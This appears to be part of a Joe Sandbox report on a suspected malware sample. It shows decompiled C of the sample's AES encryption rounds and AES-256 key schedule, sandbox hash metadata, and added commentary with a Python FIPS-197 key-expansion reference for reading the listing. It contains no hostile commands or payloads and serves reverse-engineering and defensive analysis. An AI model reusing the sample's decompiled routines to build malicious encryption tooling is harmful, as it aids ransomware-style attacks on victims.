                                        					_t558 =  *(0xfc6a240 + (_t553 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t555 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t804 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t729 & 0x000000ff) * 4) ^  *_t1114;
                                        					_t666 =  *(0xfc6aa40 + (_t804 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t728 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t555 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t556 & 0x000000ff) * 4) ^ _t1114[1];
                                        					_t1115 =  &(_t1114[4]);
                                        					 *_t1179 = _t1115;
                                        					asm("rol ebx, 0x10");
                                        					_t560 = _t558 & 0xffff0000 | _t666 >> 0x00000010;
                                        					_t812 = _t811 >> 0x10;
                                        					_t561 = _t560 >> 0x10;
                                        					_t731 = _t730 >> 0x10;
                                        					_t1127 =  *_t1179;
                                        					_t819 = _t1179[7];
                                        					 *_t819 =  *(0xfc6b240 + (_t558 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_t560 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t812 & 0x000000ff) * 4) ^  *(0xfc6ba40 + (_t731 & 0x000000ff) * 4) ^  *_t1127;
                                        					_t819[1] =  *(0xfc6ba40 + (_t812 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_t730 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t560 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t561 & 0x000000ff) * 4) ^ _t1127[1];
                                        					_t819[2] = _t1115[2] ^  *(0xfc6b240 + (_t730 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_t811 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t666 & 0x000000ff) * 4) ^  *(0xfc6ba40 + (_t561 & 0x000000ff) * 4);
                                        					_t819[3] = _t1115[3] ^  *(0xfc6b240 + (_t811 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_t558 & 0x000000ff) * 4) ^  *(0xfc6ba40 + (_t666 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t731 & 0x000000ff) * 4);
                                        					_t564 = 0;
                                        				} else {
                                        					if(_t851 == 0xc0) {
                                        						L5:
                                        						_t1129 =  &(_t997[4]);
                                        						 *_t1179 = _t1129;
                                        						asm("rol ebx, 0x10");
                                        						_t566 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
                                        						_t820 = _t739 >> 0x10;
                                        						_t567 = _t566 >> 0x10;
                                        						_t732 = _t712 >> 0x10;
                                        						_t733 = _t1129[2] ^  *(0xfc6a240 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t567 & 0x000000ff) * 4);
                                        						_t827 = _t1129[3] ^  *(0xfc6a240 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t732 & 0x000000ff) * 4);
                                        						_t1141 =  *_t1179;
                                        						_t569 =  *(0xfc6a240 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t566 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t820 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t732 & 0x000000ff) * 4) ^  *_t1141;
                                        						_t685 =  *(0xfc6aa40 + (_t820 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t566 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t567 & 0x000000ff) * 4) ^ _t1141[1];
                                        						_t1142 =  &(_t1141[4]);
                                        						 *_t1179 = _t1142;
                                        						asm("rol ebx, 0x10");
                                        						_t571 = _t569 & 0xffff0000 | _t685 >> 0x00000010;
                                        						_t828 = _t827 >> 0x10;
                                        						_t572 = _t571 >> 0x10;
                                        						_t734 = _t733 >> 0x10;
                                        						_t712 = _t1142[2] ^  *(0xfc6a240 + (_t733 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t827 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t685 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t572 & 0x000000ff) * 4);
                                        						_t739 = _t1142[3] ^  *(0xfc6a240 + (_t827 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t569 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t685 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t734 & 0x000000ff) * 4);
                                        						_t997 =  *_t1179;
                                        						_t513 =  *(0xfc6a240 + (_t569 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t571 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t828 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t734 & 0x000000ff) * 4) ^  *_t997;
                                        						_t585 =  *(0xfc6aa40 + (_t828 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t733 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t571 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t572 & 0x000000ff) * 4) ^ _t997[1];
                                        						goto L6;
                                        					} else {
                                        						if(_t851 == 0xe0) {
                                        							_t1154 =  &(_t997[4]);
                                        							 *_t1179 = _t1154;
                                        							asm("rol ebx, 0x10");
                                        							_t575 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
                                        							_t835 = _t739 >> 0x10;
                                        							_t576 = _t575 >> 0x10;
                                        							_t735 = _t712 >> 0x10;
                                        							_t736 = _t1154[2] ^  *(0xfc6a240 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t576 & 0x000000ff) * 4);
                                        							_t842 = _t1154[3] ^  *(0xfc6a240 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t735 & 0x000000ff) * 4);
                                        							_t1166 =  *_t1179;
                                        							_t578 =  *(0xfc6a240 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t575 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t835 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t735 & 0x000000ff) * 4) ^  *_t1166;
                                        							_t702 =  *(0xfc6aa40 + (_t835 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t575 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t576 & 0x000000ff) * 4) ^ _t1166[1];
                                        							_t1167 =  &(_t1166[4]);
                                        							 *_t1179 = _t1167;
                                        							asm("rol ebx, 0x10");
                                        							_t580 = _t578 & 0xffff0000 | _t702 >> 0x00000010;
                                        							_t843 = _t842 >> 0x10;
                                        							_t581 = _t580 >> 0x10;
                                        							_t737 = _t736 >> 0x10;
                                        							_t712 = _t1167[2] ^  *(0xfc6a240 + (_t736 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t842 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t702 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t581 & 0x000000ff) * 4);
                                        							_t739 = _t1167[3] ^  *(0xfc6a240 + (_t842 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t578 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t702 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t737 & 0x000000ff) * 4);
                                        							_t997 =  *_t1179;
                                        							_t513 =  *(0xfc6a240 + (_t578 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t580 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t843 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t737 & 0x000000ff) * 4) ^  *_t997;
                                        							_t585 =  *(0xfc6aa40 + (_t843 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t736 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t580 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t581 & 0x000000ff) * 4) ^ _t997[1];
                                        							goto L5;
                                        						} else {
                                        							_t564 = 0xffffffff;
                                        						}
                                        					}
                                        				}
                                        				return _t564;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
• Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 316a5c89e61f296ee320ccade8f13c8994a2d5fbed1f54608f3de79061ce686e
                                        • Instruction ID: 23555ca7537798ab40a4e59e24263215a6e6f0886d7224606d8c89a3760489a2
                                        • Opcode Fuzzy Hash: 316a5c89e61f296ee320ccade8f13c8994a2d5fbed1f54608f3de79061ce686e
                                        • Instruction Fuzzy Hash: 83625A31C0827A8FDB80DF6FE48612673A2EB54333B4A4526FB446B295D63C7534AB74
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0FC683C0(signed int _a4, intOrPtr* _a8) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				intOrPtr* _t274;
                                        				signed int _t284;
                                        				signed int _t287;
                                        				unsigned int _t289;
                                        				intOrPtr _t297;
                                        				signed int _t306;
                                        				signed int _t309;
                                        				unsigned int _t311;
                                        				intOrPtr _t319;
                                        				signed int _t328;
                                        				signed int _t331;
                                        				unsigned int _t333;
                                        				intOrPtr _t341;
                                        				signed int _t350;
                                        				signed int _t353;
                                        				unsigned int _t355;
                                        				intOrPtr _t363;
                                        				signed int _t372;
                                        				signed int _t375;
                                        				unsigned int _t377;
                                        				intOrPtr _t385;
                                        				signed int _t394;
                                        				signed int _t397;
                                        				unsigned int _t399;
                                        				intOrPtr _t407;
                                        				signed int _t416;
                                        				intOrPtr* _t420;
                                        				signed int _t421;
                                        				signed int _t422;
                                        				signed int _t423;
                                        				signed int _t424;
                                        				signed int _t425;
                                        				signed int _t426;
                                        				signed char _t427;
                                        				signed int _t428;
                                        				signed int _t429;
                                        				signed int _t430;
                                        				signed int _t431;
                                        				signed int _t441;
                                        				intOrPtr _t442;
                                        				signed int _t458;
                                        				intOrPtr _t459;
                                        				signed int _t475;
                                        				intOrPtr _t476;
                                        				signed int _t492;
                                        				intOrPtr _t493;
                                        				signed int _t509;
                                        				intOrPtr _t510;
                                        				signed int _t526;
                                        				intOrPtr _t527;
                                        				signed int _t542;
                                        				signed int _t543;
                                        				signed int _t544;
                                        				signed int _t545;
                                        				signed int _t546;
                                        				signed int _t547;
                                        				signed int _t548;
                                        				signed int _t549;
                                        				signed int _t551;
                                        				signed int _t553;
                                        				signed int _t554;
                                        				signed int _t555;
                                        				signed int _t556;
                                        				signed int _t557;
                                        				signed int _t558;
                                        				signed int _t559;
                                        				signed int _t561;
                                        				signed int _t562;
                                        				signed int _t563;
                                        				signed int _t564;
                                        				signed int _t565;
                                        				signed int _t566;
                                        				signed int _t567;
                                        				intOrPtr _t568;
                                        
                                        				_t274 = _a4;
                                        				_t420 = _a8;
                                        				_t428 =  *_t274;
                                        				_v12 = _t428;
                                        				 *_t420 = _t428;
                                        				_t429 =  *((intOrPtr*)(_t274 + 4));
                                        				 *((intOrPtr*)(_t420 + 4)) = _t429;
                                        				_v16 = _t429;
                                        				_t430 =  *((intOrPtr*)(_t274 + 8));
                                        				 *((intOrPtr*)(_t420 + 8)) = _t430;
                                        				_v8 = _t430;
                                        				_t431 =  *((intOrPtr*)(_t274 + 0xc));
                                        				 *((intOrPtr*)(_t420 + 0xc)) = _t431;
                                        				_t543 =  *(_t274 + 0x10);
                                        				 *(_t420 + 0x10) = _t543;
                                        				_t561 =  *(_t274 + 0x14);
                                        				 *(_t420 + 0x14) = _t561;
                                        				_a4 = _t431;
                                        				_t553 =  *(_t274 + 0x18);
                                        				 *(_t420 + 0x18) = _t553;
                                        				_t421 =  *(_t274 + 0x1c);
                                        				 *(_a8 + 0x1c) = _t421;
                                        				_t284 = _v12 ^  *(0xfc6ba40 + (_t421 >> 0x18) * 4) ^  *(0xfc6b640 + (_t421 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t421 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t421 & 0x000000ff) * 4) ^  *0xfc6a200;
                                        				_v12 = _t284;
                                        				 *(_a8 + 0x20) = _t284;
                                        				_t441 = _v16 ^ _t284;
                                        				_v16 = _t441;
                                        				 *(_a8 + 0x24) = _t441;
                                        				_t287 = _v8 ^ _t441;
                                        				_t442 = _a8;
                                        				_v8 = _t287;
                                        				 *(_t442 + 0x28) = _t287;
                                        				_t289 = _a4 ^ _v8;
                                        				 *(_t442 + 0x2c) = _t289;
                                        				_a4 = _t289;
                                        				_t297 = _a8;
                                        				_t544 = _t543 ^  *(0xfc6be40 + (_t289 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
                                        				_t562 = _t561 ^ _t544;
                                        				_t554 = _t553 ^ _t562;
                                        				_t422 = _t421 ^ _t554;
                                        				 *(_t297 + 0x30) = _t544;
                                        				 *(_t297 + 0x34) = _t562;
                                        				 *(_t297 + 0x38) = _t554;
                                        				 *(_t297 + 0x3c) = _t422;
                                        				_t306 = _v12 ^  *(0xfc6ba40 + (_t422 >> 0x18) * 4) ^  *(0xfc6b640 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t422 & 0x000000ff) * 4) ^  *0xfc6a204;
                                        				_v12 = _t306;
                                        				 *(_a8 + 0x40) = _t306;
                                        				_t458 = _v16 ^ _t306;
                                        				_v16 = _t458;
                                        				 *(_a8 + 0x44) = _t458;
                                        				_t309 = _v8 ^ _t458;
                                        				_t459 = _a8;
                                        				_v8 = _t309;
                                        				 *(_t459 + 0x48) = _t309;
                                        				_t311 = _a4 ^ _v8;
                                        				 *(_t459 + 0x4c) = _t311;
                                        				_a4 = _t311;
                                        				_t319 = _a8;
                                        				_t545 = _t544 ^  *(0xfc6be40 + (_t311 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t311 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
                                        				_t563 = _t562 ^ _t545;
                                        				_t555 = _t554 ^ _t563;
                                        				_t423 = _t422 ^ _t555;
                                        				 *(_t319 + 0x50) = _t545;
                                        				 *(_t319 + 0x54) = _t563;
                                        				 *(_t319 + 0x58) = _t555;
                                        				 *(_t319 + 0x5c) = _t423;
                                        				_t328 = _v12 ^  *(0xfc6ba40 + (_t423 >> 0x18) * 4) ^  *(0xfc6b640 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t423 & 0x000000ff) * 4) ^  *0xfc6a208;
                                        				_v12 = _t328;
                                        				 *(_a8 + 0x60) = _t328;
                                        				_t475 = _v16 ^ _t328;
                                        				_v16 = _t475;
                                        				 *(_a8 + 0x64) = _t475;
                                        				_t331 = _v8 ^ _t475;
                                        				_t476 = _a8;
                                        				_v8 = _t331;
                                        				 *(_t476 + 0x68) = _t331;
                                        				_t333 = _a4 ^ _v8;
                                        				 *(_t476 + 0x6c) = _t333;
                                        				_a4 = _t333;
                                        				_t341 = _a8;
                                        				_t546 = _t545 ^  *(0xfc6be40 + (_t333 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t333 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
                                        				_t564 = _t563 ^ _t546;
                                        				_t556 = _t555 ^ _t564;
                                        				_t424 = _t423 ^ _t556;
                                        				 *(_t341 + 0x70) = _t546;
                                        				 *(_t341 + 0x74) = _t564;
                                        				 *(_t341 + 0x78) = _t556;
                                        				 *(_t341 + 0x7c) = _t424;
                                        				_t350 = _v12 ^  *(0xfc6ba40 + (_t424 >> 0x18) * 4) ^  *(0xfc6b640 + (_t424 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t424 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t424 & 0x000000ff) * 4) ^  *0xfc6a20c;
                                        				_v12 = _t350;
                                        				 *(_a8 + 0x80) = _t350;
                                        				_t492 = _v16 ^ _t350;
                                        				_v16 = _t492;
                                        				 *(_a8 + 0x84) = _t492;
                                        				_t353 = _v8 ^ _t492;
                                        				_t493 = _a8;
                                        				_v8 = _t353;
                                        				 *(_t493 + 0x88) = _t353;
                                        				_t355 = _a4 ^ _v8;
                                        				 *(_t493 + 0x8c) = _t355;
                                        				_a4 = _t355;
                                        				_t363 = _a8;
                                        				_t547 = _t546 ^  *(0xfc6be40 + (_t355 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t355 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
                                        				_t565 = _t564 ^ _t547;
                                        				_t557 = _t556 ^ _t565;
                                        				 *(_t363 + 0x90) = _t547;
                                        				 *(_t363 + 0x94) = _t565;
                                        				 *(_t363 + 0x98) = _t557;
                                        				_t425 = _t424 ^ _t557;
                                        				 *(_t363 + 0x9c) = _t425;
                                        				_t372 = _v12 ^  *(0xfc6ba40 + (_t425 >> 0x18) * 4) ^  *(0xfc6b640 + (_t425 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t425 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t425 & 0x000000ff) * 4) ^  *0xfc6a210;
                                        				_v12 = _t372;
                                        				 *(_a8 + 0xa0) = _t372;
                                        				_t509 = _v16 ^ _t372;
                                        				_v16 = _t509;
                                        				 *(_a8 + 0xa4) = _t509;
                                        				_t375 = _v8 ^ _t509;
                                        				_t510 = _a8;
                                        				_v8 = _t375;
                                        				 *(_t510 + 0xa8) = _t375;
                                        				_t377 = _a4 ^ _v8;
                                        				 *(_t510 + 0xac) = _t377;
                                        				_a4 = _t377;
                                        				_t385 = _a8;
                                        				_t548 = _t547 ^  *(0xfc6be40 + (_t377 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t377 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
                                        				_t566 = _t565 ^ _t548;
                                        				_t558 = _t557 ^ _t566;
                                        				_t426 = _t425 ^ _t558;
                                        				 *(_t385 + 0xb0) = _t548;
                                        				 *(_t385 + 0xb4) = _t566;
                                        				 *(_t385 + 0xb8) = _t558;
                                        				 *(_t385 + 0xbc) = _t426;
                                        				_t394 = _v12 ^  *(0xfc6ba40 + (_t426 >> 0x18) * 4) ^  *(0xfc6b640 + (_t426 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t426 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t426 & 0x000000ff) * 4) ^  *0xfc6a214;
                                        				_v12 = _t394;
                                        				 *(_a8 + 0xc0) = _t394;
                                        				_t526 = _v16 ^ _t394;
                                        				_v16 = _t526;
                                         				 *(_a8 + 0xc4) = _t526;
                                         				_t397 = _v8 ^ _t526;
                                         				_t527 = _a8;
                                         				_v8 = _t397;
                                         				 *(_t527 + 0xc8) = _t397;
                                         				_t399 = _a4 ^ _v8;
                                         				 *(_t527 + 0xcc) = _t399;
                                         				_a4 = _t399;
                                         				_t407 = _a8;
                                         				// Unrotated S-box lookup through the four consecutive 1 KiB tables at
                                         				// 0xfc6b240, 0xfc6b640, 0xfc6ba40 and 0xfc6be40 (each byte of the previous
                                         				// word selects one entry): the plain SubWord that an AES-256 key schedule
                                         				// applies to the fifth word of every eight-word group.
                                         				_t549 = _t548 ^  *(0xfc6be40 + (_t399 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
                                         				_t567 = _t566 ^ _t549;
                                         				_t559 = _t558 ^ _t567;
                                         				_t427 = _t426 ^ _t559;
                                         				 *(_t407 + 0xd4) = _t567;
                                         				_t568 = _t407;
                                         				 *(_t407 + 0xd0) = _t549;
                                         				 *(_t568 + 0xd8) = _t559;
                                         				 *(_t568 + 0xdc) = _t427;
                                         				// Rotated lookup (RotWord + SubWord) XORed with the round constant read from
                                         				// 0xfc6a218: the first word of the next eight-word group. Round-key words
                                         				// occupy context offsets 0x00..0xec, i.e. 60 dwords = 4 * (14 + 1).
                                         				_t416 = _v12 ^  *(0xfc6ba40 + (_t427 >> 0x18) * 4) ^  *(0xfc6b640 + (_t427 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t427 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t427 & 0x000000ff) * 4) ^  *0xfc6a218;
                                         				 *((intOrPtr*)(_t568 + 0xf0)) = 0;
                                         				_t542 = _v16 ^ _t416;
                                         				 *(_t568 + 0xe0) = _t416;
                                         				_t551 = _v8 ^ _t542;
                                         				 *(_t568 + 0xe4) = _t542;
                                         				 *(_t568 + 0xec) = _a4 ^ _t551;
                                         				 *(_t568 + 0xe8) = _t551;
                                         				// The byte at +0xf0 records the round-key length: 0xe0 = 14 rounds * 16 bytes,
                                         				// which is a 256-bit key. Clearing the dword and then writing rounds*16 into
                                         				// its low byte matches the context layout of Brian Gladman's AES code.
                                         				 *((char*)(_t568 + 0xf0)) = 0xe0;
                                         				return 0;
                                         			}
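                                         The tail above stores the last six round-key words and then the byte 0xe0 at +0xf0. That value is 14 * 16, the round-key byte count of a 256-bit key, and the two lookup patterns (one rotated and XORed with a round constant, one unrotated) are the RotWord/SubWord and plain SubWord steps of the AES-256 key schedule. The reference implementation below is an added example, not code from the sample or from the Joe Sandbox report, written so the table-driven form can be read against FIPS-197. The context packing it produces (60 dwords followed by a dword whose low byte is rounds*16) is an assumption that matches the offsets in the listing; the key it checks itself against is the FIPS-197 Appendix A.3 expansion key.

```python
"""Reference AES-256 key expansion (FIPS-197 section 5.2) for reading the table-driven
schedule in the listing above. Added example; not code from the sample or the report."""
from __future__ import annotations

# GF(2^8) arithmetic and the S-box, generated rather than pasted, so individual
# entries can be compared with the lookup tables at 0xfc6b240.. if needed.
def _xtime(a: int) -> int:
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a

def _gf_mul(a: int, b: int) -> int:
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = _xtime(a)
        b >>= 1
    return r

def _gf_inv(a: int) -> int:
    if a == 0:
        return 0
    return next(b for b in range(1, 256) if _gf_mul(a, b) == 1)

def _build_sbox() -> list[int]:
    sbox = []
    for x in range(256):
        inv = _gf_inv(x)
        s = inv
        for i in range(1, 5):                       # affine map: x ^ rotl(x,1..4) ^ 0x63
            s ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
        sbox.append(s ^ 0x63)
    return sbox

SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40]   # AES-256 consumes seven round constants

def _sub_word(w: int) -> int:
    return ((SBOX[w >> 24] << 24) | (SBOX[(w >> 16) & 0xFF] << 16)
            | (SBOX[(w >> 8) & 0xFF] << 8) | SBOX[w & 0xFF])

def _rot_word(w: int) -> int:
    return ((w << 8) | (w >> 24)) & 0xFFFFFFFF

def expand_key_256(key: bytes) -> list[int]:
    """Return the 60 round-key words w[0..59] (Nk = 8, Nr = 14) as big-endian ints."""
    if len(key) != 32:
        raise ValueError("AES-256 key must be 32 bytes")
    w = [int.from_bytes(key[4 * i:4 * i + 4], "big") for i in range(8)]
    for i in range(8, 60):
        temp = w[i - 1]
        if i % 8 == 0:
            # RotWord + SubWord + rcon: the rotated lookup XORed with *0xfc6a218 in the listing
            temp = _sub_word(_rot_word(temp)) ^ (RCON[i // 8 - 1] << 24)
        elif i % 8 == 4:
            # AES-256 only: plain SubWord on the fifth word of each group, the unrotated lookup
            temp = _sub_word(temp)
        w.append(w[i - 8] ^ temp)
    return w

def rounds_from_inf_byte(inf: int) -> int:
    """The byte stored at +0xf0 is rounds * 16 (0xe0 -> 14); this is its inverse."""
    return inf >> 4

def pack_context(key: bytes) -> bytes:
    """Lay the schedule out as the listing does (assumption: Gladman-style context):
    60 dwords at +0x00..+0xec, then a dword at +0xf0 whose low byte is rounds * 16."""
    w = expand_key_256(key)
    rounds = len(w) // 4 - 1                                   # 14
    return b"".join(x.to_bytes(4, "big") for x in w) + (rounds * 16).to_bytes(4, "little")

# FIPS-197 Appendix A.3 expansion key, used as a known-answer check.
FIPS_A3_KEY = bytes.fromhex(
    "603deb1015ca71be2b73aef0857d7781"
    "1f352c073b6108d72d9810a30914dff4")

if __name__ == "__main__":
    for i, word in enumerate(expand_key_256(FIPS_A3_KEY)):
        print(f"w[{i:2d}] = {word:08x}")
```

                                         The `i % 8 == 4` branch has no counterpart in AES-128 or AES-192 schedules, so an unrotated S-box lookup without a round constant, as at +0xd0 above, is the quickest way to tell a 256-bit expansion from a shorter one in decompiled output.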
                                        			}

                                         Instruction addresses covered by the listing above: 0x0fc683c6 to 0x0fc68943 (165 entries).

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                         • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cae4c3427bf36a78a052d0018d054dff979a8e6e0260708321e78fb5444478cc
                                        • Instruction ID: 8effdc153ed88afccdeecbf981a4134ba51a0367747c3ec3ffedcea99079af08
                                        • Opcode Fuzzy Hash: cae4c3427bf36a78a052d0018d054dff979a8e6e0260708321e78fb5444478cc
                                        • Instruction Fuzzy Hash: C012EA70A141199FCB48CF2AD491A6AB7F1FF8D311B4280AEE90ADB381C735EA51DB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                         • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
                                        • Instruction ID: 8ff4464bdc5c48267d963a9817f6f5d4a1b4ea3624731e63552dc11d26e032c0
                                        • Opcode Fuzzy Hash: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
                                        • Instruction Fuzzy Hash: FCD19675A0821A8FCB20CF58C8C1BAAB7B1BF48314F6945A9D855AF342D735FA51DB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0FC643E0(void* __eflags) {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
